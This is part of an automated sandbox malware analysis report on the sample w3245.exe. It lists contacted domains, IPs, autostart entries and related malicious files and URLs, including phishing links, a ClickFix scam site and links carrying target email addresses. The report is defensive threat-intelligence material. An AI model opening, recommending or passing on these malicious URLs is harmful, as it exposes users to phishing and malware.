C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcp100.dll | 0% | ReversingLabs | |
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcr100.dll | 0% | ReversingLabs | |
No Antivirus matches
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high
sb.scorecardresearch.com | 18.244.18.32 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
googlehosted.l.googleusercontent.com | 142.250.186.97 | true | false | | high
bamarelakij.site | 104.21.80.52 | true | false | | unknown
clients2.googleusercontent.com | unknown | unknown | false | | high
bzib.nelreports.net | unknown | unknown | false | | high
assets.msn.com | unknown | unknown | false | | high
c.msn.com | unknown | unknown | false | | high
ntp.msn.com | unknown | unknown | false | | high
api.msn.com | unknown | unknown | false | | high
                          NameMaliciousAntivirus DetectionReputation
                          https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109885&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                            high
                            https://c.msn.com/c.gif?rnd=1736201107293&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b231fc407e8e42d98aaddb9cf46080a1&activityId=b231fc407e8e42d98aaddb9cf46080a1&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=E04C6472ECD84BAC8F19BD5E6C9ADC9E&MUID=04956DB2EAC862DE2FFB78DEEBAA63F6false
                              high
                              https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3Dfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://sb.scorecardresearch.com/b?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                    high
                                                                    http://www.winimage.com/zLibDllRescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                      high
                                                                      http://www.reneelab.com/RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://isecure.reneelab.com/webapi.php?code=RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()RescueCDBurner.exe, 00000002.00000002.1716689796.000000006C7E9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000002.1777743809.000000006CD59000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://trolltech.com/xml/features/report-whitespace-only-CharDataRescueCDBurner.exe, 00000002.00000002.1715868582.000000006BED9000.00000002.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000002.00000003.1697665872.0000000001812000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1777625557.000000006CC89000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                        high
                                                                        http://www.surfok.de/cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://downloads.reneelab.com.cn/passnow/passnow_RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anonyRescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.softwareok.comRescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000000.1972974789.00000001401E0000.00000002.00000001.01000000.0000001C.sdmpfalse
                                                                          high
                                                                          http://appsyndication.org/2006/appsynw3245.exefalse
                                                                            high
                                                                            http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurchaRescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
23.57.90.157 | unknown | United States | 35994 | AKAMAI-ASUS | false
20.189.173.4 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
108.139.47.50 | unknown | United States | 16509 | AMAZON-02US | false
162.159.61.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
20.110.205.119 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
204.79.197.219 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
142.250.186.97 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
172.64.41.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
23.57.90.149 | unknown | United States | 35994 | AKAMAI-ASUS | false
18.244.18.32 | sb.scorecardresearch.com | United States | 16509 | AMAZON-02US | false
104.21.80.52 | bamarelakij.site | United States | 13335 | CLOUDFLARENETUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
IP
192.168.2.4
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584991
Start date and time:2025-01-06 23:03:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 28s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:32
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:w3245.exe
Detection:MAL
Classification:mal80.spyw.evad.winEXE@72/347@23/13
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 116
• Number of non-executed functions: 270
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 142.250.185.78, 13.107.6.158, 172.205.25.163, 2.16.168.107, 2.16.168.113, 2.19.97.195, 2.19.97.170, 2.23.227.215, 2.23.227.208, 2.23.209.36, 2.23.209.29, 2.23.209.28, 2.23.209.35, 2.23.209.45, 2.23.209.25, 2.23.209.33, 2.23.209.34, 2.23.209.48, 13.74.129.1, 204.79.197.237, 13.107.21.237, 2.16.168.115, 2.16.168.122, 48.209.162.134, 142.250.64.67, 142.250.80.99, 142.250.176.195, 23.200.88.28, 23.200.88.26, 23.200.88.27, 23.200.88.32, 23.200.88.31, 23.200.88.34, 23.200.88.29, 23.200.88.33, 23.200.88.30, 20.109.210.53, 52.149.20.212, 23.56.254.164, 13.107.246.45, 40.126.32.136, 13.107.246.40, 4.152.133.8, 20.96.153.111, 23.57.90.105, 142.250.80.10, 23.46.156.51
• Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, prod-agic-ne-9.northeurope.cloudapp.azure.com, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www.googleapis.com, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, mira.config.skype.com, config.edge.skype.com.trafficmanager.net, c-ms
• Execution Graph export aborted for target RescueCDBurner.exe, PID 5828 because there are no executed function
• Execution Graph export aborted for target RescueCDBurner.exe, PID 6296 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: w3245.exe
Time | Type | Description
17:04:00 | API Interceptor | 1x Sleep call for process: w3245.exe modified
17:04:38 | API Interceptor | 13x Sleep call for process: LocalCtrl_alpha_v3.exe modified
22:04:18 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT5346.tmp
22:04:31 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helpmonitorv3.lnk
22:05:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
22:05:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link
108.139.47.50 | random.exe | Get hash | malicious | Unknown | Browse
108.139.47.50 | HVlonDQpuI.exe | Get hash | malicious | Vidar | Browse
108.139.47.50 | ChoForgot.exe | Get hash | malicious | Vidar | Browse
108.139.47.50 | QIo3SytSZA.exe | Get hash | malicious | Vidar | Browse
108.139.47.50 | T0x859fNfn.exe | Get hash | malicious | Vidar | Browse
108.139.47.50 | file.exe | Get hash | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse
108.139.47.50 | file.exe | Get hash | malicious | Stealc, Vidar | Browse
108.139.47.50 | file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | Browse
108.139.47.50 | https://nekofile.eu.org/f8e2cb54931bf39d6c12eo5nc | Get hash | malicious | Unknown | Browse
108.139.47.50 | http://www.sdmts.com/business-center/for-hire-vehicle-administration&c=E,1,pc5oom8YsW1RqHtANaUTLgMvd2z37r_4n-NR90jlF12Z7NyUKYXr1sKmCXY3dgMIENHwNl8jxylzX2garHrVx3wU2gE5fuDMBydZQ2COLEQJ&typo=1 | Get hash | malicious | Unknown | Browse
162.159.61.3 | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | Get hash | malicious | Remcos | Browse
162.159.61.3 | Tax_Refund_Claim_2024_Australian_Taxation_Office.js | Get hash | malicious | Remcos | Browse
162.159.61.3 | Yoranis Setup.exe | Get hash | malicious | Unknown | Browse
162.159.61.3 | random.exe | Get hash | malicious | Unknown | Browse
162.159.61.3 | random.exe | Get hash | malicious | Unknown | Browse
162.159.61.3 | http://www.cipassoitalia.it/ | Get hash | malicious | CAPTCHA Scam ClickFix | Browse
162.159.61.3 | Setup.exe.7z | Get hash | malicious | Unknown | Browse
162.159.61.3 | over.ps1 | Get hash | malicious | Vidar | Browse
162.159.61.3 | MJhe4xWsnR.msi | Get hash | malicious | Unknown | Browse
162.159.61.3 | MJhe4xWsnR.msi | Get hash | malicious | Unknown | Browse
23.57.90.157 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
20.189.173.4 | Document Review for Recent Transaction - Signature requested by Xiomara Baldwin Support Team.eml | Get hash | malicious | Lure-BasedAttack | Browse
20.189.173.4 | FW_ Signature Required For Agreement with ID_41392PJBM8759674.msg | Get hash | malicious | Unknown | Browse
20.189.173.4 | phish_alert_sp2_2.0.0.0.eml | Get hash | malicious | HTMLPhisher | Browse
20.189.173.4 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
20.189.173.4 | phish_alert_sp2_2.0.0.0 (1).eml | Get hash | malicious | Unknown | Browse
20.189.173.4 | https://forms.office.com/r/kiNP3VZaGz | Get hash | malicious | Unknown | Browse
20.189.173.4 | 23eb97f4-980c-745d-c5e2-6fdb70189e48.eml | Get hash | malicious | HTMLPhisher | Browse
20.189.173.4 | Teams.exe | Get hash | malicious | NetSupport RAT | Browse
20.189.173.4 | 9d565bee-e6ce-1842-e729-b0df8f08ed34.eml | Get hash | malicious | HTMLPhisher | Browse
20.189.173.4 | SecuriteInfo.com.Trojan.Agent.19085.17583.exe | Get hash | malicious | Unknown | Browse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
sb.scorecardresearch.com | Yoranis Setup.exe | Get hash | malicious | Unknown | Browse | 18.173.166.9
sb.scorecardresearch.com | random.exe | Get hash | malicious | Unknown | Browse | 13.32.110.104
sb.scorecardresearch.com | random.exe | Get hash | malicious | Unknown | Browse | 18.244.18.27
sb.scorecardresearch.com | nv8401986_110422.exe | Get hash | malicious | Qjwmonkey | Browse | 18.244.18.122
sb.scorecardresearch.com | over.ps1 | Get hash | malicious | Vidar | Browse | 18.244.18.27
sb.scorecardresearch.com | 6684V5n83w.exe | Get hash | malicious | Vidar | Browse | 18.244.18.38
sb.scorecardresearch.com | 25F.tmp.exe | Get hash | malicious | Darkbot | Browse | 18.244.18.38
sb.scorecardresearch.com | BHgwhz3lGN.exe | Get hash | malicious | Vidar | Browse | 18.244.18.122
sb.scorecardresearch.com | Tool_Unlock_v1.2.exe | Get hash | malicious | Vidar | Browse | 18.161.69.30
sb.scorecardresearch.com | Hwacaj.exe | Get hash | malicious | Darkbot | Browse | 18.161.69.8
chrome.cloudflare-dns.com | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 172.64.41.3
chrome.cloudflare-dns.com | Tax_Refund_Claim_2024_Australian_Taxation_Office.js | Get hash | malicious | Remcos | Browse | 162.159.61.3
chrome.cloudflare-dns.com | Yoranis Setup.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
                                                                                                                                          Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          EwpsQzeky5.msiGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          Setup.exe.7zGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          fg.microsoft.map.fastly.netFLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.214.172
                                                                                                                                          nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.214.172
                                                                                                                                          ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                          • 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052a | malicious | HTMLPhisher | 13.107.246.61
https://u43161309.ct.sendgrid.net/ls/click?upn=u001.L9-2FCbhkaoUACh7As3yZ8i4iABGphfl-2FJgS6Xiu1aw6I-3DgXpA_qO4VbBWAKg4gLfGs-2BfuSyZki3gKzG4I1DrYN15Q8fD7JV1twLeLo1AFs1GBSG3ZgA22dFJdXJloKc56aXDeV3olJKTBJd8NprednZ2LeXdX-2BkcSQE-2F2FRwgBng5RbUCLfjS8-2FI3mrpwyYu9lRatIB62qUwPSax-2Fhh2c7R-2B7pT3Kos0wK0SEJGj4ZMkgOGYhEniKYT7Kn7jN25xFz2sFdtPlVQkIdCFKwDNWmq-2BrAxerZE2GuKgfkuf3l1UY4J42sOOltybAAVyLhV-2BXfmbuQpN4NpshXRIuhta8ho3ChcTA5NtgjludQThyLtwhGns-2ByLqSbpO1Bhhc-2FCgdgP-2BAOxYrGHvKHjVYRr6-2BiryADxfM-3D | malicious | HTMLPhisher | 20.185.72.223
AllItems.htm | malicious | HTMLPhisher | 13.107.136.10
Vernales Restaurant-encrypted.pdf | malicious | HTMLPhisher | 13.107.246.60
https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956235d3ed2bb80da1204238e412cdfe561cf1e7cff409a79a97da8a2d431ccef9065ebae57f03416d61f0971abb897fde199a21f0da5d9085251df31eb6747d99920190103a51a045e3e309308fa5f3a1ca3&action_type=SIGN | malicious | HTMLPhisher | 13.107.246.45
http://click.pstmrk.it | malicious | Unknown | 20.10.16.51
DownloadedMessage.zip | malicious | HTMLPhisher | 40.126.32.138
http://phothockey.ch | malicious | CAPTCHA Scam ClickFix | 13.107.42.14
https://hacdct-my.sharepoint.com/:f:/g/personal/dmarra_hacdct_org/El0CfhNMVMNNuzPj6QGnrSQBywVLNW96w_XrX10UdRlfmQ?email=dhodder%40haigroup.com&e=d37USF&xsdata=MDV8MDJ8am1ja2lubGV5QGhhaWdyb3VwLmNvbXwyYzYxNmM3ZDhlNmU0YWM5MDJlMjA4ZGQyZTYzYjFmMnw4MjgxNWI4YzM3NzU0NTk5OTdjNzJiODc1MjhlNmY4M3wwfDB8NjM4NzE3NzMyNjY3MjIxNDQzfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXw0MDAwfHx8&sdata=bXM5KzduUjdVc3RFaFJsU1ZBR1d1enMxT3I3VitIdmc4MUlhZ25WT3dmWT0%3d | malicious | HTMLPhisher | 104.47.55.156
https://hacdct-my.sharepoint.com/:f:/g/personal/dmarra_hacdct_org/El0CfhNMVMNNuzPj6QGnrSQBywVLNW96w_XrX10UdRlfmQ?email=dhodder%40haigroup.com&e=d37USF&xsdata=MDV8MDJ8am1ja2lubGV5QGhhaWdyb3VwLmNvbXwyYzYxNmM3ZDhlNmU0YWM5MDJlMjA4ZGQyZTYzYjFmMnw4MjgxNWI4YzM3NzU0NTk5OTdjNzJiODc1MjhlNmY4M3wwfDB8NjM4NzE3NzMyNjY3MjIxNDQzfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXw0MDAwfHx8&sdata=bXM5KzduUjdVc3RFaFJsU1ZBR1d1enMxT3I3VitIdmc4MUlhZ25WT3dmWT0%3d | malicious | HTMLPhisher | 104.47.55.156

Match: AMAZON-02US
https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052a | malicious | HTMLPhisher | 13.33.187.74
Jeffparish.docx | malicious | Unknown | 34.249.87.52
https://u43161309.ct.sendgrid.net/ls/click?upn=u001.L9-2FCbhkaoUACh7As3yZ8i4iABGphfl-2FJgS6Xiu1aw6I-3DgXpA_qO4VbBWAKg4gLfGs-2BfuSyZki3gKzG4I1DrYN15Q8fD7JV1twLeLo1AFs1GBSG3ZgA22dFJdXJloKc56aXDeV3olJKTBJd8NprednZ2LeXdX-2BkcSQE-2F2FRwgBng5RbUCLfjS8-2FI3mrpwyYu9lRatIB62qUwPSax-2Fhh2c7R-2B7pT3Kos0wK0SEJGj4ZMkgOGYhEniKYT7Kn7jN25xFz2sFdtPlVQkIdCFKwDNWmq-2BrAxerZE2GuKgfkuf3l1UY4J42sOOltybAAVyLhV-2BXfmbuQpN4NpshXRIuhta8ho3ChcTA5NtgjludQThyLtwhGns-2ByLqSbpO1Bhhc-2FCgdgP-2BAOxYrGHvKHjVYRr6-2BiryADxfM-3D | malicious | HTMLPhisher | 18.153.4.44
https://dreamsmaybachawuradekasa.org/?dococbwt&qrc=ZHlsYW4uZHVmZnk4QHlhaG9vLmNvbQ== | malicious | Unknown | 3.161.82.9
http://click.pstmrk.it | malicious | Unknown | 18.245.46.12
https://www.figma.com/design/Sw6t5vElBVmnrFNiteka8B/Untitled-(Copy)?node-id=0-1&p=f&t=x9aFU3FgLH1rkKBK-0 | malicious | Unknown | 13.32.121.19
Remittance details.docx | malicious | Unknown | 52.94.140.208
https://z97f4f2525fyg27.webflow.io/ | malicious | HTMLPhisher | 52.222.232.99
Remittance details.docx | malicious | Unknown | 18.157.237.165
ppc.elf | malicious | Unknown | 34.249.145.219

Match: CLOUDFLARENETUS
https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com | malicious | HTMLPhisher | 188.114.96.3
https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052a | malicious | HTMLPhisher | 104.17.247.203
https://solve.jrqr.org/awjxs.captcha?u=df8172c9-2ab6-423b-8c92-85669127a20a | malicious | Unknown | 104.21.27.98
Jeffparish.docx | malicious | Unknown | 104.17.24.14
https://u43161309.ct.sendgrid.net/ls/click?upn=u001.L9-2FCbhkaoUACh7As3yZ8i4iABGphfl-2FJgS6Xiu1aw6I-3DgXpA_qO4VbBWAKg4gLfGs-2BfuSyZki3gKzG4I1DrYN15Q8fD7JV1twLeLo1AFs1GBSG3ZgA22dFJdXJloKc56aXDeV3olJKTBJd8NprednZ2LeXdX-2BkcSQE-2F2FRwgBng5RbUCLfjS8-2FI3mrpwyYu9lRatIB62qUwPSax-2Fhh2c7R-2B7pT3Kos0wK0SEJGj4ZMkgOGYhEniKYT7Kn7jN25xFz2sFdtPlVQkIdCFKwDNWmq-2BrAxerZE2GuKgfkuf3l1UY4J42sOOltybAAVyLhV-2BXfmbuQpN4NpshXRIuhta8ho3ChcTA5NtgjludQThyLtwhGns-2ByLqSbpO1Bhhc-2FCgdgP-2BAOxYrGHvKHjVYRr6-2BiryADxfM-3D | malicious | HTMLPhisher | 104.18.86.42
https://dreamsmaybachawuradekasa.org/?dococbwt&qrc=ZHlsYW4uZHVmZnk4QHlhaG9vLmNvbQ== | malicious | Unknown | 104.18.95.41
Vernales Restaurant-encrypted.pdf | malicious | HTMLPhisher | 104.17.25.14
u1XWB0BIju.msi | malicious | Unknown | 104.21.112.1
ZipThis.exe | malicious | Unknown | 104.18.2.200
https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956235d3ed2bb80da1204238e412cdfe561cf1e7cff409a79a97da8a2d431ccef9065ebae57f03416d61f0971abb897fde199a21f0da5d9085251df31eb6747d99920190103a51a045e3e309308fa5f3a1ca3&action_type=SIGN | malicious | HTMLPhisher | 104.17.25.14

Match: AKAMAI-ASUS
malware.bat | malicious | PureLog Stealer, RHADAMANTHYS | 184.28.90.27
https://www.scribd.com/document/787929982/script-tlsfrance | malicious | Unknown | 104.102.34.86
Fantazy.x86.elf | malicious | Unknown | 23.44.181.15
Fantazy.m68k.elf | malicious | Unknown | 95.101.191.171
Fantazy.arm7.elf | malicious | Mirai | 104.76.15.30
momo.arm7.elf | malicious | Mirai | 95.101.248.33
z0r0.x86.elf | malicious | Mirai | 23.51.98.56
armv6l.elf | malicious | Unknown | 23.75.90.11
